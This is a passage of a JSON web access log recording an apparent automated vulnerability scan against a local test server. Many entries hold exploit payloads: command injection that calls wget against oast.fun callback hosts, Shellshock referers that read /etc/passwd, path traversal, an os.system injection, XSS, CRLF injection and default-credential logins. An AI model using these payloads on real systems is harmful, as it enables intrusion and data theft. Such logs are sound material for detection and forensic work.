Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c9v8h88smpv8c1ig07h0mam3f97n35zff.oast.fun%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c9v8h88smpv8c1ig07h0g1ts7mskboj37.oast.fun%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pagespeed-global-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ansible.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/GetDocLink.ashx?link=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c9v8h88smpv8c1ig07h0p7rnwxwg38nrm.oast.fun%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c9v8h88smpv8c1ig07h0ch6nt9kbw16w6.oast.fun%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"lang=en_US&cat_id=6\x22>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?ajax-request=jnews HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/xml/webuser-auth.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crossdomain.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/showLogon.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/data.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.DS_Store HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"userName=admin&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xxl-job-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/57 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=nuclei%25{128*128} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/58 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"{\x22@type\x22:\x22java.lang.AutoCloseable\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/stats HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/59 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/status/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 